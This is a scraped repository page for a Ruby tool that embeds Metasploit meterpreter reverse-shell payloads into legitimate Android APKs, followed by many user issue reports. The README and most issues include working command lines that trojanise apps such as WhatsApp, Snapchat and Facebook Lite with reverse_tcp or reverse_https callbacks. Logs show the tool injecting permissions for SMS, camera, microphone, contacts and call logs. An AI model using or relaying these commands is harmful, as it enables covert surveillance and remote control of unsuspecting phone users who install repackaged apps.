Giter Club home page Giter Club logo

metasploit-apk-embed-payload's Introduction

Use it on your own risk Donate

Embed a Metasploit Payload in an Original .Apk File

I choose a lazy person to do a hard job. Because a lazy person will find an easy way to do it.

โ€” Bill Gates

This script is a POC for injecting metasploit payloads on arbitrary APKs

Authored by timwr, Jack64 , developed by xC0d3rZ

Installation

 gem install bundler
 bundler install

Requirements

  1. Ruby (>= 1.8.7).
  2. apktool.jar (>= 2.x).

Usage

./run [target.apk] [msfvenom options]

e.g 
./run messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443

Download

metasploit-apk-embed-payload's People

Contributors

0-ali avatar powdo avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

subinacls umar14 deepbugs kbahaxor powdo gustavolobo2003 akbariani linuxmainia mzakyz666 neticx songofhack xxsinjectacion peterpt netwrkspider u53r55 4d4m4n71um melshalpy vaginessa fingerleakers ykankaya ro9ueadmin xhabibx f0829 asim-altayb dannymas rakhithjk gaurav0143 cmdsecure vrillerion whitedevil2000 4aryash ieon23 dskho trauma32 pretech86 masbog hackumono hardheadedadam harie112 darksidesfear ktm2590 t81232750 3453-315h cyberdefence-toolkit hossamahmedsholah butterstoch pb0rz3l maju91 beetstik tonykhoriaty rovaherve

metasploit-apk-embed-payload's Issues

backdoor priv esclate

i keep getting this error" stdapi_fs_ls" when i trying to look into the sdcard and cant even upload things but when us embed backdoor i can do anything i want is there anyway to fix it tks!

original.apk was not found or was not readable.

It seems like Bug 15 is still there.

Embed a Metasploit Payload in an Original .Apk File v0.2
[1] Generating msfvenom payload
[2] Signing payload
cp: das angegebene Ziel '/tmp/D2KT664/original.apk' ist kein Verzeichnis
[3] Decomposing original APK
Input file (/tmp/D2KT664/original.apk) was not found or was not readable.
[4] Decomposing payload APK
lib/embed-payload.rb:210:in `initialize': No such file or directory @ rb_sysopen - /tmp/D2KT664/original/AndroidManifest.xml (Errno::ENOENT)
	from lib/embed-payload.rb:210:in `open'
	from lib/embed-payload.rb:210:in `embeddingPayload'
	from lib/embed-payload.rb:11:in `initialize'
	from apk-embed-payload.rb:30:in `new'
	from apk-embed-payload.rb:30:in `<main>'

I get this stacktrace with following command:
ruby apk-embed-payload.rb BezahlLadung.apk -p android/meterpreter/reverse_tcp LHOST=192.168.43.88 LPORT=4444

I'm using ruby 2.4

ruby --version
ruby 2.4.0p0 (2016-12-24 revision 57164) [x86_64-linux]

On Arch GNU/*/Linux

uname -a
Linux Pipboy 4.9.8-1-ARCH #1 SMP PREEMPT Mon Feb 6 12:59:40 CET 2017 x86_64 GNU/Linux

My msfvenom is working fine.
And im pretty sure that all needed gems are correctly installed.

bash: ./run no such file or directory

Hi there!
gem bundler installs fine, but when i try to run following:
./run Night_Mode.apk -p android/meterpreter/reverse_http LHOST=192.168.1.102 LPORT=24
error occurs:
bash: ./run: No such file or directory
i'm running that command from root directory which contains Night_Mode.apk
what should i do?

java.lang.NoClassDefFoundError

I've just embeded a ms payload into an app but when I try to run the application it fails with java.lang.NoClassDefFoundError

05-31 20:39:12.207 E/AndroidRuntime( 2900): FATAL EXCEPTION: main
05-31 20:39:12.207 E/AndroidRuntime( 2900): Process: com.example.fabio.myapplication, PID: 2900
05-31 20:39:12.207 E/AndroidRuntime( 2900): java.lang.NoClassDefFoundError: Failed resolution of: Lcom/metasploit/stage/d;
05-31 20:39:12.207 E/AndroidRuntime( 2900): at com.metasploit.stage.Payload.startInPath(Unknown Source)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at com.metasploit.stage.Payload.start(Unknown Source)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at com.example.fabio.myapplication.MainActivity.onCreate(MainActivity.java:10)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.app.Activity.performCreate(Activity.java:6679)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1118)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2618)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2726)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.app.ActivityThread.-wrap12(ActivityThread.java)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1477)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.os.Handler.dispatchMessage(Handler.java:102)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.os.Looper.loop(Looper.java:154)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.app.ActivityThread.main(ActivityThread.java:6119)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at java.lang.reflect.Method.invoke(Native Method)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:886)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:776)
05-31 20:39:12.207 E/AndroidRuntime( 2900): Caused by: java.lang.ClassNotFoundException: Didn't find class "com.metasploit.stage.d" on path: DexPathList[[zip file "/data/app/com.example.fabio.myapplication-1/base.apk"],nativeLibraryDirectories=[/data/app/com.example.fabio.myapplication-1/lib/x86, /system/lib, /vendor/lib]]
05-31 20:39:12.207 E/AndroidRuntime( 2900): at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at java.lang.ClassLoader.loadClass(ClassLoader.java:380)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at java.lang.ClassLoader.loadClass(ClassLoader.java:312)

The command to generate the apk was just:

./run myapp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=5555

backdoor

ok the programm worked when install open it keep closes sesssion even tho i still on the app...how to fix it?

Missing file or dir

It seems like the Programs cant find a file called payload.apk
But the dir /tmp/NJTYNVC/ is created with a original/ dir and a original.apk in it.

[2] Signing payload
java.io.FileNotFoundException: /tmp/NJTYNVC/payload.apk (Datei oder Verzeichnis nicht gefunden)
  at java.util.zip.ZipFile.open(Native Method)
  at java.util.zip.ZipFile.<init>(ZipFile.java:219)
  at java.util.zip.ZipFile.<init>(ZipFile.java:149)
  at java.util.jar.JarFile.<init>(JarFile.java:166)
  at java.util.jar.JarFile.<init>(JarFile.java:145)
  at com.android.signapk.SignApk.main(SignApk.java:320)

Another exception in step 4

[4] Decomposing payload APK
Input file (/tmp/NJTYNVC/signapk.apk) was not found or was not readable.

And a final one in step 7

[7] Loading MainActivity.smali and injecting payload
lib/embed-payload.rb:79:in initialize: No such file or directory @ rb_sysopen - /tmp/NJTYNVC/payload/AndroidManifest.xml (Errno::ENOENT)
  from lib/embed-payload.rb:79:in open
  from lib/embed-payload.rb:79:in fixManifest
  from lib/embed-payload.rb:246:in embeddingPayload
  from lib/embed-payload.rb:11:in initialize
  from apk-embed-payload.rb:30:in new
  from apk-embed-payload.rb:30:in <main>

I guess it depends on signing.
Im useing Arch GNU/Linux with ruby 2.3 & OpenJDK 1.8.2 (64 Bit)

Error in the ruby file

Traceback (most recent call last):
6: from apk-embed-payload.rb:30:in <main>' 5: from apk-embed-payload.rb:30:in new'
4: from lib/embed-payload.rb:11:in initialize' 3: from lib/embed-payload.rb:246:in embeddingPayload'
2: from lib/embed-payload.rb:79:in fixManifest' 1: from lib/embed-payload.rb:79:in open'
lib/embed-payload.rb:79:in `initialize': No such file or directory @ rb_sysopen - /tmp/JFP27FG/payload/AndroidManifest.xml (Errno::ENOENT)
Screenshot 2020-03-23 22:14:18
Screenshot 2020-03-23 22:15:05

Error

ruby apk-embed-payload.rb ClashOriginal.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=4444
/usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in require': cannot load such file -- colorize (LoadError) from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in require'
from apk-embed-payload.rb:9:in `

'

what should I do?!

embade backdoor problem

i get this when i run the command
./run snapchat.apk -p android/meterpreter/reverse_https LHOST=192.168.0.105 LPORT=4444
/usr/local/lib/site_ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in require': cannot load such file -- colorize (LoadError) from /usr/local/lib/site_ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:inrequire'
from apk-embed-payload.rb:9:in `

'
how do i fix it?

Error when Rebuilding

Error when Rebuilding when Rebuilding .apk with metasploit payload
[!] Upgrade apktool to the latest apktool.jar fixes the issue completely
i allready using last apktool 2.2.1

Embedded Payload not running

Hi Team,

I am unsure if I am doing something wrong - I can't seem to get the _embedded APK

Environment: Fully updated Kali 2 (Rolling)
Command: ./run original.apk.file.apk -p android/meterpreter/reverse_tcp LHOST=my.domain.com
Notes: Creating a direct APK (msfvenom) using the same options worked exactly as expected.

Output from command:

Embed a Metasploit Payload in an Original .Apk File v0.2
[1] Generating msfvenom payload
[2] Signing payload
[3] Decomposing original APK
[4] Decomposing payload APK
[5] Locating onCreate() hook
[6] Copying payload files
[7] Loading StartupActivity.smali and injecting payload
[+] Adding android.permission.ACCESS_WIFI_STATE
[+] Adding android.permission.CHANGE_WIFI_STATE
[+] Adding android.permission.ACCESS_NETWORK_STATE
[+] Adding android.permission.ACCESS_COURSE_LOCATION
[+] Adding android.permission.ACCESS_FINE_LOCATION
[+] Adding android.permission.SEND_SMS
[+] Adding android.permission.RECEIVE_SMS
[+] Adding android.permission.RECORD_AUDIO
[+] Adding android.permission.CALL_PHONE
[+] Adding android.permission.READ_CONTACTS
[+] Adding android.permission.WRITE_CONTACTS
[+] Adding android.permission.RECORD_AUDIO
[+] Adding android.permission.CAMERA
[+] Adding android.permission.READ_SMS
[+] Adding android.permission.RECEIVE_BOOT_COMPLETED
[+] Adding android.permission.SET_WALLPAPER
[+] Adding android.permission.READ_CALL_LOG
[+] Adding android.permission.WRITE_CALL_LOG
[8] Rebuilding original.apk.file.apk with metasploit payload
W: warning: string 'chapter_no' has no default translation.
W: warning: string 'directory_error' has no default translation.
W: warning: string 'new_label_prompt' has no default translation.
W: warning: string 'prefs_split_screen_linked' has no default translation.
W: warning: string 'prefs_split_screen_not_linked' has no default translation.
W: warning: string 'prefs_split_screen_single' has no default translation.
W: warning: string 'prefs_split_screen_summary' has no default translation.
W: warning: string 'prefs_split_screen_title' has no default translation.
W: warning: string 'sdcard_error' has no default translation.
W: warning: string 'send_sms' has no default translation.
[9] Signing net_embedded.apk
[+]  has been embedded,original.apk.file.apk_embedded.apk

Is it possible that the warnings listed above could be preventing the the embedded metasploit APK from running? I didn't think much of it as it was a warning vs error.

ERROR during building the embedded apk

Hi, I've tried your script so far, and an error comes out at the final step of the script before the signing phase. I have apktool 2.2.1 currently installed on my Kali 2016 rolling system. I got 2 different errors, for two different original .apk:
First error (a LinkedIn apk):
[8] Rebuilding linkedin.apk with metasploit payload W: /tmp/K9REEEW/original/AndroidManifest.xml:46: error: No resource identifier found for attribute 'networkSecurityConfig' in package 'android' W: Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_1166162700259302219.tmp, p, --forced-package-id, 127, --min-sdk-version, 15, --target-sdk-version, 25, --version-code, 88800, --version-name, 4.0.85, -F, /tmp/APKTOOL5712275118375082832.tmp, -0, arsc, -0, webp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/K9REEEW/original/res, -M, /tmp/K9REEEW/original/AndroidManifest.xml] at brut.androlib.Androlib.buildResourcesFull(Androlib.java:478) at brut.androlib.Androlib.buildResources(Androlib.java:412) at brut.androlib.Androlib.build(Androlib.java:311) at brut.androlib.Androlib.build(Androlib.java:264) at brut.apktool.Main.cmdBuild(Main.java:227) at brut.apktool.Main.main(Main.java:84) Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_1166162700259302219.tmp, p, --forced-package-id, 127, --min-sdk-version, 15, --target-sdk-version, 25, --version-code, 88800, --version-name, 4.0.85, -F, /tmp/APKTOOL5712275118375082832.tmp, -0, arsc, -0, webp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/K9REEEW/original/res, -M, /tmp/K9REEEW/original/AndroidManifest.xml] at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:439) at brut.androlib.Androlib.buildResourcesFull(Androlib.java:464) ... 5 more Caused by: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_1166162700259302219.tmp, p, --forced-package-id, 127, --min-sdk-version, 15, --target-sdk-version, 25, --version-code, 88800, --version-name, 4.0.85, -F, /tmp/APKTOOL5712275118375082832.tmp, -0, arsc, -0, webp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/K9REEEW/original/res, -M, /tmp/K9REEEW/original/AndroidManifest.xml] at brut.util.OS.exec(OS.java:95) at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:433) ... 6 more [!] Upgrade apktool to the latest apktool.jar fixes the issue completely

Then with FacebookLite apk I got:
[+] Adding android.permission.WRITE_CALL_LOG [8] Rebuilding facebooklite.apk with metasploit payload ../../../../tmp/WP3V3KK/original/smali/com/facebook/lite/MainActivity.smali[522,4] Invalid register: v22. Must be between v0 and v15, inclusive. Exception in thread "main" brut.androlib.AndrolibException: Could not smali file: com/facebook/lite/MainActivity.smali at brut.androlib.src.SmaliBuilder.buildFile(SmaliBuilder.java:77) at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:61) at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:38) at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:405) at brut.androlib.Androlib.buildSources(Androlib.java:336) at brut.androlib.Androlib.build(Androlib.java:292) at brut.androlib.Androlib.build(Androlib.java:264) at brut.apktool.Main.cmdBuild(Main.java:227) at brut.apktool.Main.main(Main.java:84) [!] Upgrade apktool to the latest apktool.jar fixes the issue completely

In both cases your script stopped before I can even test an app with embedded payload.

Probleme to find hook

[] Unable to find correct hook automatically
[] Please choose from one of the following:
[*]

no point proposed.

I've simply change the type of message to "info" where not a "error" in embed-payload.rb ln 219

219 messagePrint("Unable to find correct hook automatically","info")

apktool

bro mohammed ali i face problem during compile apk
it say : upgrade your apktool to least version
note : i try it manual i means decompile original apk and payload then cpi it inside original dir then compile it but show me same massage
::
ู…ุฑุญุจุง ุงุฎูŠ ุงู†ุช ู…ู† ุงู„ุณูˆุฏุงู† ูˆุงู†ุง ุงูŠุถุง ู‚ุฑุงุช ุนู† ุณูŠุฑุชูƒ ุชุญุจ
AI
ูˆุงู†ุง ุงูŠุถุง ุตุฑุงุช ุงุฑูŠุฏ ุงู„ุชูˆุงุตู„ ู…ุนูƒ ุฑุงุจุท ุตูุญุฉ ุงู„ููŠุณ ุจูˆูƒ ุฎุงุตุชูƒ ู„ุง ูŠุนู…ู„
ุงู„ุฑุฌุงุก ุงู„ุฑุฏ

Can't listen

When i open the apk with Bluestack , the app launches correctly but on my msf nothing happens yet it seems to me correctly configured

apktool error is showing

thisi is the error i got after executing this

./apkembed.rb facebook.apk -p android/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XXX LPORT=4444

[-] Apktool version Apktool v1.5.2 - a tool for reengineering Android apk files
Copyright 2010 Ryszard Wiล›niewski [email protected]
with smali v1.4.1, and baksmali v1.4.1
Updated by @iBotPeaches [email protected]
Apache License 2.0 (http://www.apache.org/licenses/LICENSE-2.0)

Usage: apktool [-q|--quiet OR -v|--verbose] COMMAND [...]

COMMANDs are:

d[ecode] [OPTS] <file.apk> [<dir>]
    Decode <file.apk> to <dir>.

    OPTS:

    -s, --no-src
        Do not decode sources.
    -r, --no-res
        Do not decode resources.
    -d, --debug
        Decode in debug mode. Check project page for more info.
    -b, --no-debug-info
        Baksmali -- don't write out debug info (.local, .param, .line, etc.)
    -f, --force
        Force delete destination directory.
    -t <tag>, --frame-tag <tag>
        Try to use framework files tagged by <tag>.
    --frame-path <dir>
        Use the specified directory for framework files
    --keep-broken-res
        Use if there was an error and some resources were dropped, e.g.:
        "Invalid config flags detected. Dropping resources", but you
        want to decode them anyway, even with errors. You will have to
        fix them manually before building.

b[uild] [OPTS] [<app_path>] [<out_file>]
    Build an apk from already decoded application located in <app_path>.

    It will automatically detect, whether files was changed and perform
    needed steps only.

    If you omit <app_path> then current directory will be used.
    If you omit <out_file> then <app_path>/dist/<name_of_original.apk>
    will be used.

    OPTS:

    -f, --force-all
        Skip changes detection and build all files.
    -d, --debug
        Build in debug mode. Check project page for more info.
    -a, --aapt
        Loads aapt from specified location.

if|install-framework <framework.apk> [<tag>] --frame-path [<location>] 
    Install framework file to your system.

For additional info, see: http://code.google.com/p/android-apktool/
For smali/baksmali info, see: http://code.google.com/p/smali/
not supported, please download the latest 2. version from git.

What is the origin of the signapk signature?

Is it just any old cert you created, and if so, why not include the openssl commands for certificate creation at script runtime? It seems like it makes sense for openssl to be a dependency of this project.

Internet Not Found

I am connected with internet and my internet is also working youtube is working but it is not detecting internet

Many Problems

First:-

[2] Signing payload
java.io.FileNotFoundException: /tmp/K7X9X9K/payload.apk (No such file or directory)
	at java.util.zip.ZipFile.open(Native Method)
	at java.util.zip.ZipFile.<init>(ZipFile.java:225)
	at java.util.zip.ZipFile.<init>(ZipFile.java:155)
	at java.util.jar.JarFile.<init>(JarFile.java:166)
	at java.util.jar.JarFile.<init>(JarFile.java:145)
	at com.android.signapk.SignApk.main(SignApk.java:320)

Second: Third Phase is full of this

[3] Decomposing original APK
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionCode, value=0x00000055
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionName, value=0x0000001a
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionCode, value=0x00000055
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionName, value=0x0000001a
W: Could not decode attr value, using undecoded value instead: ns=android, name=installLocation, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=minSdkVersion, value=0x00000007
W: Could not decode attr value, using undecoded value instead: ns=android, name=targetSdkVersion, value=0x00000015
W: Could not decode attr value, using undecoded value instead: ns=android, name=anyDensity, value=0xffffffff

and ends with this

Exception in thread "main" brut.androlib.AndrolibException: java.io.FileNotFoundException: /root/.local/share/apktool/framework/1.apk (No such file or directory)
	at brut.androlib.res.AndrolibResources.getFrameworkApk(AndrolibResources.java:588)
	at brut.androlib.res.AndrolibResources.loadFrameworkPkg(AndrolibResources.java:121)
	at brut.androlib.res.data.ResTable.getPackage(ResTable.java:83)
	at brut.androlib.res.data.ResTable.getResSpec(ResTable.java:66)
	at brut.androlib.res.data.ResTable.getResSpec(ResTable.java:62)
	at brut.androlib.res.data.value.ResReferenceValue.getReferent(ResReferenceValue.java:62)
	at brut.androlib.res.data.value.ResReferenceValue.referentIsNull(ResReferenceValue.java:73)
	at brut.androlib.res.data.value.ResStyleValue.serializeToResValuesXml(ResStyleValue.java:49)
	at brut.androlib.res.data.value.ResBagValue.serializeToResValuesXml(ResBagValue.java:42)
	at brut.androlib.res.AndrolibResources.generateValuesFile(AndrolibResources.java:517)
	at brut.androlib.res.AndrolibResources.decode(AndrolibResources.java:267)
	at brut.androlib.Androlib.decodeResourcesFull(Androlib.java:131)
	at brut.androlib.ApkDecoder.decode(ApkDecoder.java:108)
	at brut.apktool.Main.cmdDecode(Main.java:166)
	at brut.apktool.Main.main(Main.java:81)
Caused by: java.io.FileNotFoundException: /root/.local/share/apktool/framework/1.apk (No such file or directory)
	at java.io.FileOutputStream.open0(Native Method)
	at java.io.FileOutputStream.open(FileOutputStream.java:270)
	at java.io.FileOutputStream.<init>(FileOutputStream.java:213)
	at java.io.FileOutputStream.<init>(FileOutputStream.java:162)
	at brut.androlib.res.AndrolibResources.getFrameworkApk(AndrolibResources.java:584)
	... 14 more

Third:-

[4] Decomposing payload APK
Input file (/tmp/K7X9X9K/signapk.apk) was not found or was not readable.

Fourth:-

[5] Locating onCreate() hook
lib/embed-payload.rb:215:in `embeddingPayload': undefined method `gsub' for 0:Integer (NoMethodError)
	from lib/embed-payload.rb:11:in `initialize'
	from apk-embed-payload.rb:30:in `new'
	from apk-embed-payload.rb:30:in `<main>'

The rmagick gem trouble on linux

If suddenly you get this error

Building native extensions.  This could take a while...
ERROR:  Error installing rmagick:
    ERROR: Failed to build gem native extension.
Can't install RMagick 2.13.2. Can't find Magick-config

That means the devel package is not installed, so you pick it up on Ubuntu > 12.04

sudo apt-get install libmagick++-dev

and you get complete stack

dpkg -l | grep imagema
ii  imagemagick
ii  imagemagick-common
ii  libmagic1:i386
ii  libmagick++-dev
......

based on this link

Error creating injection APK

I'm getting this:

[9] Rebuilding app-debug.apk with meterpreter injection as app-debug_backdoored.apk
Exception in thread "main" brut.androlib.AndrolibException: brut.directory.DirectoryException: java.io.FileNotFoundException: /root/metasploit-apk-embed-payload/tmp/NP7YEQ/app-debug_backdoored.apk (No such file or directory)

The full log.
I'm sure I have the android-sdk installed correctly. (from apt-get, and in my path).

Ubuntu 16.04 with ruby 2.3.1p112 (2016-04-26) [x86_64-linux-gnu]

Error Android SDK

`duard@LoveTC:/opt/metasploit-framework/Apks/metasploit-apk-embed-payload$ cp ../WhatsApp.apk .
duard@LoveTC:/opt/metasploit-framework/Apks/metasploit-apk-embed-payload$ ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895

โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ•šโ•โ•โ–ˆโ–ˆโ–ˆโ•”โ•
โ•šโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ•”โ•
โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ•šโ•โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ•”โ•
โ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ•—โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
โ•šโ•โ• โ•šโ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ• โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•

[] Authored by timwr, Jack64&Updated by xC0d3rZ.
sh: 1: /opt/metasploit-framework/Apks/metasploit-apk-embed-payload/embed_tools/apktool.sh: Permission denied
apk-embed-payload.rb:156:in <main>': undefined methodinclude?' for nil:NilClass (NoMethodError)
duard@LoveTC:/opt/metasploit-framework/Apks/metasploit-apk-embed-payload$ chmod +x embed_tools/.sh
duard@LoveTC:/opt/metasploit-framework/Apks/metasploit-apk-embed-payload$ ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895

โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ•šโ•โ•โ–ˆโ–ˆโ–ˆโ•”โ•
โ•šโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ•”โ•
โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ•šโ•โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ•”โ•
โ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ•—โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
โ•šโ•โ• โ•šโ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ• โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•

[] Authored by timwr, Jack64&Updated by xC0d3rZ.
[1] Generating msfvenom payload
[2] Signing payload
[3] Decompiling orignal APK
[4] Decompiling payload APK
[5] Locating onCreate() hook
[6] Copying payload files
[7] Loading Main.smali and injecting payload
[8] Poisoning the manifest with meterpreter permissions
[] Adding android.permission.ACCESS_COURSE_LOCATION
[] Adding android.permission.CALL_PHONE
[] Adding android.permission.READ_SMS
[] Adding android.permission.SET_WALLPAPER
[] Adding android.permission.READ_CALL_LOG
[*] Adding android.permission.WRITE_CALL_LOG
[9] Rebuilding WhatsApp.apk with meterpreter injection as WhatsApp_backdoored.apk
[-] Error creating injection APK,If you haven't Android-SDK please install it.
`

screenshot from 2016-08-09 00-36-23

Permissions problem on Android

Hello,

I've tried your script with the last WhatsApp apk, nothing seems to go wrong, i upload the apk_embed on my phone and there i've these problems :

  • When i click on the app to install build with the script i get this :

install_apk_block

  • When i try to make it by hand (Decompiling, moving, building, etc ...) i get this and the payload didn't start when app launch :

install_app_payload_hand

  • And when i build only the payload with msfvenom everything work like this :

original_payload_apk

